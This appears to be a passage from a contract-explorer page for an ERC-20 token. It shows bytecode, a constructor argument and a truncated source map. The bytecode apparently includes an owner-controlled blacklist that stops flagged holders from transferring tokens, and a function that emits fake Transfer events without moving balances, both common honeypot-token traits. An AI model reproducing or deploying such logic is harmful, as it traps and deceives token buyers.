7f45524332303a2064656372656173656420616c6c6f77616e63652062656c6f7760008201527f207a65726f000000000000000000000000000000000000000000000000000000602082015250565b6000611a096025836113e7565b9150611a14826119ad565b604082019050919050565b60006020820190508181036000830152611a38816119fc565b9050919050565b7f4f776e61626c653a206e6577206f776e657220697320746865207a65726f206160008201527f6464726573730000000000000000000000000000000000000000000000000000602082015250565b6000611a9b6026836113e7565b9150611aa682611a3f565b604082019050919050565b60006020820190508181036000830152611aca81611a8e565b9050919050565b7f45524332303a20617070726f76652066726f6d20746865207a65726f2061646460008201527f7265737300000000000000000000000000000000000000000000000000000000602082015250565b6000611b2d6024836113e7565b9150611b3882611ad1565b604082019050919050565b60006020820190508181036000830152611b5c81611b20565b9050919050565b7f45524332303a20617070726f766520746f20746865207a65726f20616464726560008201527f7373000000000000000000000000000000000000000000000000000000000000602082015250565b6000611bbf6022836113e7565b9150611bca82611b63565b604082019050919050565b60006020820190508181036000830152611bee81611bb2565b9050919050565b7f45524332303a207472616e7366657220616d6f756e74207a65726f0000000000600082015250565b6000611c2b601b836113e7565b9150611c3682611bf5565b602082019050919050565b60006020820190508181036000830152611c5a81611c1e565b9050919050565b7f45524332303a207472616e736665722066726f6d20746865207a65726f20616460008201527f6472657373000000000000000000000000000000000000000000000000000000602082015250565b6000611cbd6025836113e7565b9150611cc882611c61565b604082019050919050565b60006020820190508181036000830152611cec81611cb0565b9050919050565b7f45524332303a207472616e7366657220746f20746865207a65726f206164647260008201527f6573730000000000000000000000000000000000000000000000000000000000602082015250565b6000611d4f6023836113e7565b9150611d5a82611cf3565b604082019050919050565b60006020820190508181036000830152611d7e81611d42565b9050919050565b7f45524332303a207472616e7366657220616d6f756e742065786365656473206260008201527f616c616e63650000000000000000000000000000000000000000000000000000602082015250565b6000611de16026836113e7565b9150611dec82611d85565b604082019050919050565b60006020820190508181036000830152611e1081611dd4565b9050919050565b7f4f776e61626c653a2063616c6c6572206973206e6f7420746865206f776e6572600082015250565b6000611e4d6020836113e7565b9150611e5882611e17565b602082019050919050565b60006020820190508181036000830152611e7c81611e40565b9050919050565b7f45524332303a206275726e2066726f6d20746865207a65726f2061646472657360008201527f7300000000000000000000000000000000000000000000000000000000000000602082015250565b6000611edf6021836113e7565b9150611eea82611e83565b604082019050919050565b60006020820190508181036000830152611f0e81611ed2565b9050919050565b7f45524332303a206275726e20616d6f756e7420657863656564732062616c616e60008201527f6365000000000000000000000000000000000000000000000000000000000000602082015250565b6000611f716022836113e7565b9150611f7c82611f15565b604082019050919050565b60006020820190508181036000830152611fa081611f64565b9050919050565b6000611fb282611497565b9150611fbd83611497565b925082821015611fd057611fcf6118b0565b5b82820390509291505056fea2646970667358221220603bc9ee92f9a3e9b1a4d9c730427ab7790dd307d0441f8ecac117cf666250e464736f6c634300080a003300000000000000000000000056d4cbb1536b5a56540525220e8763f62ab9ea5c
Deployed Bytecode
0x608060405234801561001057600080fd5b50600436106101165760003560e01c806370a08231116100a2578063a457c2d711610071578063a457c2d7146102e3578063a9059cbb14610313578063a9ddeaa214610343578063dd62ed3e1461035f578063f2fde38b1461038f57610116565b806370a082311461026d578063715018a61461029d5780638da5cb5b146102a757806395d89b41146102c557610116565b806323b872dd116100e957806323b872dd146101b7578063313ce567146101e757806339509351146102055780633a61363a1461023557806342966c681461025157610116565b80630388e40e1461011b57806306fdde031461014b578063095ea7b31461016957806318160ddd14610199575b600080fd5b61013560048036038101906101309190611379565b6103ab565b60405161014291906113c1565b60405180910390f35b610153610401565b6040516101609190611475565b60405180910390f35b610183600480360381019061017e91906114cd565b610493565b60405161019091906113c1565b60405180910390f35b6101a16104b1565b6040516101ae919061151c565b60405180910390f35b6101d160048036038101906101cc9190611537565b6104bb565b6040516101de91906113c1565b60405180910390f35b6101ef6105b3565b6040516101fc91906115a6565b60405180910390f35b61021f600480360381019061021a91906114cd565b6105bc565b60405161022c91906113c1565b60405180910390f35b61024f600480360381019061024a9190611626565b610668565b005b61026b6004803603810190610266919061169a565b610724565b005b61028760048036038101906102829190611379565b610738565b604051610294919061151c565b60405180910390f35b6102a5610781565b005b6102af610795565b6040516102bc91906116d6565b60405180910390f35b6102cd6107bf565b6040516102da9190611475565b60405180910390f35b6102fd60048036038101906102f891906114cd565b610851565b60405161030a91906113c1565b60405180910390f35b61032d600480360381019061032891906114cd565b61093c565b60405161033a91906113c1565b60405180910390f35b61035d6004803603810190610358919061171d565b61095a565b005b6103796004803603810190610374919061177d565b610a07565b604051610386919061151c565b60405180910390f35b6103a960048036038101906103a49190611379565b610a8e565b005b6000600460008373ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff16815260200190815260200160002060009054906101000a900460ff169050919050565b606060058054610410906117ec565b80601f016020809104026020016040519081016040528092919081815260200182805461043c906117ec565b80156104895780601f1061045e57610100808354040283529160200191610489565b820191906000526020600020905b81548152906001019060200180831161046c57829003601f168201915b5050505050905090565b60006104a76104a0610b12565b8484610b1a565b6001905092915050565b6000600754905090565b60006104c8848484610ce5565b6000600360008673ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff1681526020019081526020016000206000610513610b12565b73ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff16815260200190815260200160002054905082811015610593576040517f08c379a000000000000000000000000000000000000000000000000000000000815260040161058a90611890565b60405180910390fd5b6105a78561059f610b12565b858403610b1a565b60019150509392505050565b60006009905090565b600061065e6105c9610b12565b8484600360006105d7610b12565b73ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff16815260200190815260200160002060008873ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff1681526020019081526020016000205461065991906118df565b610b1a565b6001905092915050565b610670610ff6565b60005b8484905081101561071d5784848281811061069157610690611935565b5b90506020020160208101906106a69190611379565b73ffffffffffffffffffffffffffffffffffffffff168373ffffffffffffffffffffffffffffffffffffffff167fddf252ad1be2c89b69c2b068fc378daa952ba7f163c4a11628f55a4df523b3ef84604051610702919061151c565b60405180910390a3808061071590611964565b915050610673565b5050505050565b61073561072f610b12565b8261108a565b50565b6000600260008373ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff168152602001908152602001600020549050919050565b610789610ff6565b610793600061124b565b565b6000600160009054906101000a900473ffffffffffffffffffffffffffffffffffffffff16905090565b6060600680546107ce906117ec565b80601f01602080910402602001604051908101604052809291908181526020018280546107fa906117ec565b80156108475780601f1061081c57610100808354040283529160200191610847565b820191906000526020600020905b81548152906001019060200180831161082a57829003601f168201915b5050505050905090565b60008060036000610860610b12565b73ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff16815260200190815260200160002060008573ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff1681526020019081526020016000205490508281101561091d576040517f08c379a000000000000000000000000000000000000000000000000000000000815260040161091490611a1f565b60405180910390fd5b610931610928610b12565b85858403610b1a565b600191505092915050565b6000610950610949610b12565b8484610ce5565b6001905092915050565b610962610ff6565b60005b83839050811015610a0157816004600086868581811061098857610987611935565b5b905060200201602081019061099d9190611379565b73ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff16815260200190815260200160002060006101000a81548160ff02191690831515021790555080806109f990611964565b915050610965565b50505050565b6000600360008473ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff16815260200190815260200160002060008373ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff16815260200190815260200160002054905092915050565b610a96610ff6565b600073ffffffffffffffffffffffffffffffffffffffff168173ffffffffffffffffffffffffffffffffffffffff161415610b06576040517f08c379a0000000000000000000000000000000000000000000000000000000008152600401610afd90611ab1565b60405180910390fd5b610b0f8161124b565b50565b600033905090565b600073ffffffffffffffffffffffffffffffffffffffff168373ffffffffffffffffffffffffffffffffffffffff161415610b8a576040517f08c379a0000000000000000000000000000000000000000000000000000000008152600401610b8190611b43565b60405180910390fd5b600073ffffffffffffffffffffffffffffffffffffffff168273ffffffffffffffffffffffffffffffffffffffff161415610bfa576040517f08c379a0000000000000000000000000000000000000000000000000000000008152600401610bf190611bd5565b60405180910390fd5b80600360008573ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff16815260200190815260200160002060008473ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff168152602001908152602001600020819055508173ffffffffffffffffffffffffffffffffffffffff168373ffffffffffffffffffffffffffffffffffffffff167f8c5be1e5ebec7d5bd14f71427d1e84f3dd0314c0f7b2291e5b200ac8c7c3b92583604051610cd8919061151c565b60405180910390a3505050565b60008111610d28576040517f08c379a0000000000000000000000000000000000000000000000000000000008152600401610d1f90611c41565b60405180910390fd5b600073ffffffffffffffffffffffffffffffffffffffff168373ffffffffffffffffffffffffffffffffffffffff161415610d98576040517f08c379a0000000000000000000000000000000000000000000000000000000008152600401610d8f90611cd3565b60405180910390fd5b600073ffffffffffffffffffffffffffffffffffffffff168273ffffffffffffffffffffffffffffffffffffffff161415610e08576040517f08c379a0000000000000000000000000000000000000000000000000000000008152600401610dff90611d65565b60405180910390fd5b6000600260008573ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff16815260200190815260200160002054905081811015610e8f576040517f08c379a0000000000000000000000000000000000000000000000000000000008152600401610e8690611df7565b60405180910390fd5b600460008573ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff16815260200190815260200160002060009054906101000a900460ff1615610eef5760008214610eee57600080fd5b5b818103600260008673ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff1681526020019081526020016000208190555081600260008573ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff1681526020019081526020016000206000828254610f8491906118df565b925050819055508273ffffffffffffffffffffffffffffffffffffffff168473ffffffffffffffffffffffffffffffffffffffff167fddf252ad1be2c89b69c2b068fc378daa952ba7f163c4a11628f55a4df523b3ef84604051610fe8919061151c565b60405180910390a350505050565b600080611001610b12565b73ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff16815260200190815260200160002060009054906101000a900460ff16611088576040517f08c379a000000000000000000000000000000000000000000000000000000000815260040161107f90611e63565b60405180910390fd5b565b600073ffffffffffffffffffffffffffffffffffffffff168273ffffffffffffffffffffffffffffffffffffffff1614156110fa576040517f08c379a00000000000000000000000000000000000000000000000000000000081526004016110f190611ef5565b60405180910390fd5b6000600260008473ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff16815260200190815260200160002054905081811015611181576040517f08c379a000000000000000000000000000000000000000000000000000000000815260040161117890611f87565b60405180910390fd5b818103600260008573ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff1681526020019081526020016000208190555081600760008282546111d99190611fa7565b92505081905550600073ffffffffffffffffffffffffffffffffffffffff168373ffffffffffffffffffffffffffffffffffffffff167fddf252ad1be2c89b69c2b068fc378daa952ba7f163c4a11628f55a4df523b3ef8460405161123e919061151c565b60405180910390a3505050565b6000600160009054906101000a900473ffffffffffffffffffffffffffffffffffffffff16905081600160006101000a81548173ffffffffffffffffffffffffffffffffffffffff021916908373ffffffffffffffffffffffffffffffffffffffff1602179055508173ffffffffffffffffffffffffffffffffffffffff168173ffffffffffffffffffffffffffffffffffffffff167f8be0079c531659141344cd1fd0a4f28419497f9722a3daafe3b4186f6b6457e060405160405180910390a35050565b600080fd5b600080fd5b600073ffffffffffffffffffffffffffffffffffffffff82169050919050565b60006113468261131b565b9050919050565b6113568161133b565b811461136157600080fd5b50565b6000813590506113738161134d565b92915050565b60006020828403121561138f5761138e611311565b5b600061139d84828501611364565b91505092915050565b60008115159050919050565b6113bb816113a6565b82525050565b60006020820190506113d660008301846113b2565b92915050565b600081519050919050565b600082825260208201905092915050565b60005b838110156114165780820151818401526020810190506113fb565b83811115611425576000848401525b50505050565b6000601f19601f8301169050919050565b6000611447826113dc565b61145181856113e7565b93506114618185602086016113f8565b61146a8161142b565b840191505092915050565b6000602082019050818103600083015261148f818461143c565b905092915050565b6000819050919050565b6114aa81611497565b81146114b557600080fd5b50565b6000813590506114c7816114a1565b92915050565b600080604083850312156114e4576114e3611311565b5b60006114f285828601611364565b9250506020611503858286016114b8565b9150509250929050565b61151681611497565b82525050565b6000602082019050611531600083018461150d565b92915050565b6000806000606084860312156115505761154f611311565b5b600061155e86828701611364565b935050602061156f86828701611364565b9250506040611580868287016114b8565b9150509250925092565b600060ff82169050919050565b6115a08161158a565b82525050565b60006020820190506115bb6000830184611597565b92915050565b600080fd5b600080fd5b600080fd5b60008083601f8401126115e6576115e56115c1565b5b8235905067ffffffffffffffff811115611603576116026115c6565b5b60208301915083602082028301111561161f5761161e6115cb565b5b9250929050565b600080600080606085870312156116405761163f611311565b5b600085013567ffffffffffffffff81111561165e5761165d611316565b5b61166a878288016115d0565b9450945050602061167d87828801611364565b925050604061168e878288016114b8565b91505092959194509250565b6000602082840312156116b0576116af611311565b5b60006116be848285016114b8565b91505092915050565b6116d08161133b565b82525050565b60006020820190506116eb60008301846116c7565b92915050565b6116fa816113a6565b811461170557600080fd5b50565b600081359050611717816116f1565b92915050565b60008060006040848603121561173657611735611311565b5b600084013567ffffffffffffffff81111561175457611753611316565b5b611760868287016115d0565b9350935050602061177386828701611708565b9150509250925092565b6000806040838503121561179457611793611311565b5b60006117a285828601611364565b92505060206117b385828601611364565b9150509250929050565b7f4e487b7100000000000000000000000000000000000000000000000000000000600052602260045260246000fd5b6000600282049050600182168061180457607f821691505b60208210811415611818576118176117bd565b5b50919050565b7f45524332303a207472616e7366657220616d6f756e742065786365656473206160008201527f6c6c6f77616e6365000000000000000000000000000000000000000000000000602082015250565b600061187a6028836113e7565b91506118858261181e565b604082019050919050565b600060208201905081810360008301526118a98161186d565b9050919050565b7f4e487b7100000000000000000000000000000000000000000000000000000000600052601160045260246000fd5b60006118ea82611497565b91506118f583611497565b9250827fffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffff0382111561192a576119296118b0565b5b828201905092915050565b7f4e487b7100000000000000000000000000000000000000000000000000000000600052603260045260246000fd5b600061196f82611497565b91507fffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffff8214156119a2576119a16118b0565b5b600182019050919050565b7f45524332303a2064656372656173656420616c6c6f77616e63652062656c6f7760008201527f207a65726f000000000000000000000000000000000000000000000000000000602082015250565b6000611a096025836113e7565b9150611a14826119ad565b604082019050919050565b60006020820190508181036000830152611a38816119fc565b9050919050565b7f4f776e61626c653a206e6577206f776e657220697320746865207a65726f206160008201527f6464726573730000000000000000000000000000000000000000000000000000602082015250565b6000611a9b6026836113e7565b9150611aa682611a3f565b604082019050919050565b60006020820190508181036000830152611aca81611a8e565b9050919050565b7f45524332303a20617070726f76652066726f6d20746865207a65726f2061646460008201527f7265737300000000000000000000000000000000000000000000000000000000602082015250565b6000611b2d6024836113e7565b9150611b3882611ad1565b604082019050919050565b60006020820190508181036000830152611b5c81611b20565b9050919050565b7f45524332303a20617070726f766520746f20746865207a65726f20616464726560008201527f7373000000000000000000000000000000000000000000000000000000000000602082015250565b6000611bbf6022836113e7565b9150611bca82611b63565b604082019050919050565b60006020820190508181036000830152611bee81611bb2565b9050919050565b7f45524332303a207472616e7366657220616d6f756e74207a65726f0000000000600082015250565b6000611c2b601b836113e7565b9150611c3682611bf5565b602082019050919050565b60006020820190508181036000830152611c5a81611c1e565b9050919050565b7f45524332303a207472616e736665722066726f6d20746865207a65726f20616460008201527f6472657373000000000000000000000000000000000000000000000000000000602082015250565b6000611cbd6025836113e7565b9150611cc882611c61565b604082019050919050565b60006020820190508181036000830152611cec81611cb0565b9050919050565b7f45524332303a207472616e7366657220746f20746865207a65726f206164647260008201527f6573730000000000000000000000000000000000000000000000000000000000602082015250565b6000611d4f6023836113e7565b9150611d5a82611cf3565b604082019050919050565b60006020820190508181036000830152611d7e81611d42565b9050919050565b7f45524332303a207472616e7366657220616d6f756e742065786365656473206260008201527f616c616e63650000000000000000000000000000000000000000000000000000602082015250565b6000611de16026836113e7565b9150611dec82611d85565b604082019050919050565b60006020820190508181036000830152611e1081611dd4565b9050919050565b7f4f776e61626c653a2063616c6c6572206973206e6f7420746865206f776e6572600082015250565b6000611e4d6020836113e7565b9150611e5882611e17565b602082019050919050565b60006020820190508181036000830152611e7c81611e40565b9050919050565b7f45524332303a206275726e2066726f6d20746865207a65726f2061646472657360008201527f7300000000000000000000000000000000000000000000000000000000000000602082015250565b6000611edf6021836113e7565b9150611eea82611e83565b604082019050919050565b60006020820190508181036000830152611f0e81611ed2565b9050919050565b7f45524332303a206275726e20616d6f756e7420657863656564732062616c616e60008201527f6365000000000000000000000000000000000000000000000000000000000000602082015250565b6000611f716022836113e7565b9150611f7c82611f15565b604082019050919050565b60006020820190508181036000830152611fa081611f64565b9050919050565b6000611fb282611497565b9150611fbd83611497565b925082821015611fd057611fcf6118b0565b5b82820390509291505056fea2646970667358221220603bc9ee92f9a3e9b1a4d9c730427ab7790dd307d0441f8ecac117cf666250e464736f6c634300080a0033
Constructor Arguments (ABI-Encoded and is the last bytes of the Contract Creation Code above)
00000000000000000000000056d4cbb1536b5a56540525220e8763f62ab9ea5c
-----Decoded View---------------
Arg [0] : _stakingReserveAddr (address): 0x56d4CBb1536B5A56540525220e8763f62aB9ea5c
-----Encoded View---------------
1 Constructor Arguments found :
Arg [0] : 00000000000000000000000056d4cbb1536b5a56540525220e8763f62ab9ea5c
Deployed Bytecode Sourcemap
7394:8387:0:-:0;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;15678:100;;;;;;;;;;;;;:::i;:::-;;:::i;:::-;;;;;;;:::i;:::-;;;;;;;;8163:94;;;:::i;:::-;;;;;;;:::i;:::-;;;;;;;;10360:149;;;;;;;;;;;;;:::i;:::-;;:::i;:::-;;;;;;;:::i;:::-;;;;;;;;8778:102;;;:::i;:::-;;;;;;;:::i;:::-;;;;;;;;10833:426;;;;;;;;;;;;;:::i;:::-;;:::i;:::-;;;;;;;:::i;:::-;;;;;;;;8582:94;;;:::i;:::-;;;;;;;:::i;:::-;;;;;;;;11592:190;;;;;;;;;;;;;:::i;:::-;;:::i;:::-;;;;;;;:::i;:::-;;;;;;;;15487:185;;;;;;;;;;;;;:::i;:::-;;:::i;:::-;;14840:79;;;;;;;;;;;;;:::i;:::-;;:::i;:::-;;9058:121;;;;;;;;;;;;;:::i;:::-;;:::i;:::-;;;;;;;:::i;:::-;;;;;;;;6876:103;;;:::i;:::-;;6645:87;;;:::i;:::-;;;;;;;:::i;:::-;;;;;;;;8360:98;;;:::i;:::-;;;;;;;:::i;:::-;;;;;;;;12100:370;;;;;;;;;;;;;:::i;:::-;;:::i;:::-;;;;;;;:::i;:::-;;;;;;;;9459:165;;;;;;;;;;;;;:::i;:::-;;:::i;:::-;;;;;;;:::i;:::-;;;;;;;;14502:178;;;;;;;;;;;;;:::i;:::-;;:::i;:::-;;9912:133;;;;;;;;;;;;;:::i;:::-;;:::i;:::-;;;;;;;:::i;:::-;;;;;;;;6987:201;;;;;;;;;;;;;:::i;:::-;;:::i;:::-;;15678:100;15735:4;15755:9;:17;15765:6;15755:17;;;;;;;;;;;;;;;;;;;;;;;;;15748:24;;15678:100;;;:::o;8163:94::-;8217:13;8246:5;8239:12;;;;;:::i;:::-;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;:::i;:::-;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;8163:94;:::o;10360:149::-;10438:4;10451:34;10460:12;:10;:12::i;:::-;10474:2;10478:6;10451:8;:34::i;:::-;10499:4;10492:11;;10360:149;;;;:::o;8778:102::-;8839:7;8862:12;;8855:19;;8778:102;:::o;10833:426::-;10939:4;10952:36;10962:6;10970:9;10981:6;10952:9;:36::i;:::-;10997:24;11024:11;:19;11036:6;11024:19;;;;;;;;;;;;;;;:33;11044:12;:10;:12::i;:::-;11024:33;;;;;;;;;;;;;;;;10997:60;;11092:6;11072:16;:26;;11064:79;;;;;;;;;;;;:::i;:::-;;;;;;;;;11169:57;11178:6;11186:12;:10;:12::i;:::-;11219:6;11200:16;:25;11169:8;:57::i;:::-;11249:4;11242:11;;;10833:426;;;;;:::o;8582:94::-;8640:5;7716:1;8654:16;;8582:94;:::o;11592:190::-;11675:4;11688:70;11697:12;:10;:12::i;:::-;11711:2;11747:10;11715:11;:25;11727:12;:10;:12::i;:::-;11715:25;;;;;;;;;;;;;;;:29;11741:2;11715:29;;;;;;;;;;;;;;;;:42;;;;:::i;:::-;11688:8;:70::i;:::-;11772:4;11765:11;;11592:190;;;;:::o;15487:185::-;6604:13;:11;:13::i;:::-;15581:9:::1;15576:91;15600:4;;:11;;15596:1;:15;15576:91;;;15646:4;;15651:1;15646:7;;;;;;;:::i;:::-;;;;;;;;;;;;;;;:::i;:::-;15634:25;;15643:1;15634:25;;;15655:3;15634:25;;;;;;:::i;:::-;;;;;;;;15613:3;;;;;:::i;:::-;;;;15576:91;;;;15487:185:::0;;;;:::o;14840:79::-;14886:27;14892:12;:10;:12::i;:::-;14906:6;14886:5;:27::i;:::-;14840:79;:::o;9058:121::-;9132:7;9155:9;:18;9165:7;9155:18;;;;;;;;;;;;;;;;9148:25;;9058:121;;;:::o;6876:103::-;6604:13;:11;:13::i;:::-;6941:30:::1;6968:1;6941:18;:30::i;:::-;6876:103::o:0;6645:87::-;6691:7;6718:6;;;;;;;;;;;6711:13;;6645:87;:::o;8360:98::-;8416:13;8445:7;8438:14;;;;;:::i;:::-;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;:::i;:::-;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;8360:98;:::o;12100:370::-;12188:4;12201:24;12228:11;:25;12240:12;:10;:12::i;:::-;12228:25;;;;;;;;;;;;;;;:29;12254:2;12228:29;;;;;;;;;;;;;;;;12201:56;;12292:15;12272:16;:35;;12264:85;;;;;;;;;;;;:::i;:::-;;;;;;;;;12375:62;12384:12;:10;:12::i;:::-;12398:2;12421:15;12402:16;:34;12375:8;:62::i;:::-;12460:4;12453:11;;;12100:370;;;;:::o;9459:165::-;9545:4;9558:42;9568:12;:10;:12::i;:::-;9582:9;9593:6;9558:9;:42::i;:::-;9614:4;9607:11;;9459:165;;;;:::o;14502:178::-;6604:13;:11;:13::i;:::-;14591:9:::1;14586:89;14610:4;;:11;;14606:1;:15;14586:89;;;14664:3;14643:9;:18;14653:4;;14658:1;14653:7;;;;;;;:::i;:::-;;;;;;;;;;;;;;;:::i;:::-;14643:18;;;;;;;;;;;;;;;;:24;;;;;;;;;;;;;;;;;;14623:3;;;;;:::i;:::-;;;;14586:89;;;;14502:178:::0;;;:::o;9912:133::-;9995:7;10018:11;:17;10030:4;10018:17;;;;;;;;;;;;;;;:21;10036:2;10018:21;;;;;;;;;;;;;;;;10011:28;;9912:133;;;;:::o;6987:201::-;6604:13;:11;:13::i;:::-;7096:1:::1;7076:22;;:8;:22;;;;7068:73;;;;;;;;;;;;:::i;:::-;;;;;;;;;7152:28;7171:8;7152:18;:28::i;:::-;6987:201:::0;:::o;5576:98::-;5629:7;5656:10;5649:17;;5576:98;:::o;15177:304::-;15285:1;15269:18;;:4;:18;;;;15261:67;;;;;;;;;;;;:::i;:::-;;;;;;;;;15357:1;15343:16;;:2;:16;;;;15335:63;;;;;;;;;;;;:::i;:::-;;;;;;;;;15431:6;15407:11;:17;15419:4;15407:17;;;;;;;;;;;;;;;:21;15425:2;15407:21;;;;;;;;;;;;;;;:30;;;;15464:2;15449:26;;15458:4;15449:26;;;15468:6;15449:26;;;;;;:::i;:::-;;;;;;;;15177:304;;;:::o;12726:663::-;12837:1;12828:6;:10;12820:50;;;;;;;;;;;;:::i;:::-;;;;;;;;;12903:1;12885:20;;:6;:20;;;;12877:70;;;;;;;;;;;;:::i;:::-;;;;;;;;;12983:1;12962:23;;:9;:23;;;;12954:71;;;;;;;;;;;;:::i;:::-;;;;;;;;;13034:21;13058:9;:17;13068:6;13058:17;;;;;;;;;;;;;;;;13034:41;;13107:6;13090:13;:23;;13082:74;;;;;;;;;;;;:::i;:::-;;;;;;;;;13166:9;:17;13176:6;13166:17;;;;;;;;;;;;;;;;;;;;;;;;;13163:60;;;13213:1;13203:6;:11;13195:20;;;;;;13163:60;13284:6;13268:13;:22;13248:9;:17;13258:6;13248:17;;;;;;;;;;;;;;;:42;;;;13328:6;13304:9;:20;13314:9;13304:20;;;;;;;;;;;;;;;;:30;;;;;;;:::i;:::-;;;;;;;;13365:9;13348:35;;13357:6;13348:35;;;13376:6;13348:35;;;;;;:::i;:::-;;;;;;;;12813:576;12726:663;;;:::o;6740:128::-;6804:5;:19;6810:12;:10;:12::i;:::-;6804:19;;;;;;;;;;;;;;;;;;;;;;;;;6796:64;;;;;;;;;;;;:::i;:::-;;;;;;;;;6740:128::o;14064:432::-;14163:1;14144:21;;:7;:21;;;;14136:67;;;;;;;;;;;;:::i;:::-;;;;;;;;;14212:22;14237:9;:18;14247:7;14237:18;;;;;;;;;;;;;;;;14212:43;;14288:6;14270:14;:24;;14262:71;;;;;;;;;;;;:::i;:::-;;;;;;;;;14397:6;14380:14;:23;14359:9;:18;14369:7;14359:18;;;;;;;;;;;;;;;:44;;;;14433:6;14417:12;;:22;;;;;;;:::i;:::-;;;;;;;;14479:1;14453:37;;14462:7;14453:37;;;14483:6;14453:37;;;;;;:::i;:::-;;;;;;;;14129:367;14064:432;;:::o;7196:191::-;7270:16;7289:6;;;;;;;;;;;7270:25;;7315:8;7306:6;;:17;;;;;;;;;;;;;;;;;;7370:8;7339:40;;7360:8;7339:40;;;;;;;;;;;;7259:128;7196:191;:::o;88:117:1:-;197:1;194;187:12;211:117;320:1;317;310:12;334:126;371:7;411:42;404:5;400:54;389:65;;334:126;;;:::o;466:96::-;503:7;532:24;550:5;532:24;:::i;:::-;521:35;;466:96;;;:::o;568:122::-;641:24;659:5;641:24;:::i;:::-;634:5;631:35;621:63;;680:1;677;670:12;621:63;568:122;:::o;696:139::-;742:5;780:6;767:20;758:29;;796:33;823:5;796:33;:::i;:::-;696:139;;;;:::o;841:329::-;900:6;949:2;937:9;928:7;924:23;920:32;917:119;;;955:79;;:::i;:::-;917:119;1075:1;1100:53;1145:7;1136:6;1125:9;1121:22;1100:53;:::i;:::-;1090:63;;1046:117;841:329;;;;:::o;1176:90::-;1210:7;1253:5;1246:13;1239:21;1228:32;;1176:90;;;:::o;1272:109::-;1353:21;1368:5;1353:21;:::i;:::-;1348:3;1341:34;1272:109;;:::o;1387:210::-;1474:4;1512:2;1501:9;1497:18;1489:26;;1525:65;1587:1;1576:9;1572:17;1563:6;1525:65;:::i;:::-;1387:210;;;;:::o;1603:99::-;1655:6;1689:5;1683:12;1673:22;;1603:99;;;:::o;1708:169::-;1792:11;1826:6;1821:3;1814:19;1866:4;1861:3;1857:14;1842:29;;1708:169;;;;:::o;1883:307::-;1951:1;1961:113;1975:6;1972:1;1969:13;1961:113;;;2060:1;2055:3;2051:11;2045:18;2041:1;2036:3;2032:11;2025:39;1997:2;1994:1;1990:10;1985:15;;1961:113;;;2092:6;2089:1;2086:13;2083:101;;;2172:1;2163:6;2158:3;2154:16;2147:27;2083:101;1932:258;1883:307;;;:::o;2196:102::-;2237:6;2288:2;2284:7;2279:2;2272:5;2268:14;2264:28;2254:38;;2196:102;;;:::o;2304:364::-;2392:3;2420:39;2453:5;2420:39;:::i;:::-;2475:71;2539:6;2534:3;2475:71;:::i;:::-;2468:78;;2555:52;2600:6;2595:3;2588:4;2581:5;2577:16;2555:52;:::i;:::-;2632:29;2654:6;2632:29;:::i;:::-;2627:3;2623:39;2616:46;;2396:272;2304:364;;;;:::o;2674:313::-;2787:4;2825:2;2814:9;2810:18;2802:26;;2874:9;2868:4;2864:20;2860:1;2849:9;2845:17;2838:47;2902:78;2975:4;2966:6;2902:78;:::i;:::-;2894:86;;2674:313;;;;:::o;2993:77::-;3030:7;3059:5;3048:16;;2993:77;;;:::o;3076:122::-;3149:24;3167:5;3149:24;:::i;:::-;3142:5;3139:35;3129:63;;3188:1;3185;3178:12;3129:63;3076:122;:::o;3204:139::-;3250:5;3288:6;3275:20;3266:29;;3304:33;3331:5;3304:33;:::i;:::-;3204:139;;;;:::o;3349:474::-;3417:6;3425;3474:2;3462:9;3453:7;3449:23;3445:32;3442:119;;;3480:79;;:::i;:::-;3442:119;3600:1;3625:53;3670:7;3661:6;3650:9;3646:22;3625:53;:::i;:::-;3615:63;;3571:117;3727:2;3753:53;3798:7;3789:6;3778:9;3774:22;3753:53;:::i;:::-;3743:63;;3698:118;3349:474;;;;;:::o;3829:118::-;3916:24;3934:5;3916:24;:::i;:::-;3911:3;3904:37;3829:118;;:::o;3953:222::-;4046:4;4084:2;4073:9;4069:18;4061:26;;4097:71;4165:1;4154:9;4150:17;4141:6;4097:71;:::i;:::-;3953:222;;;;:::o;4181:619::-;4258:6;4266;4274;4323:2;4311:9;4302:7;4298:23;4294:32;4291:119;;;4329:79;;:::i;:::-;4291:119;4449:1;4474:53;4519:7;4510:6;4499:9;4495:22;4474:53;:::i;:::-;4464:63;;4420:117;4576:2;4602:53;4647:7;463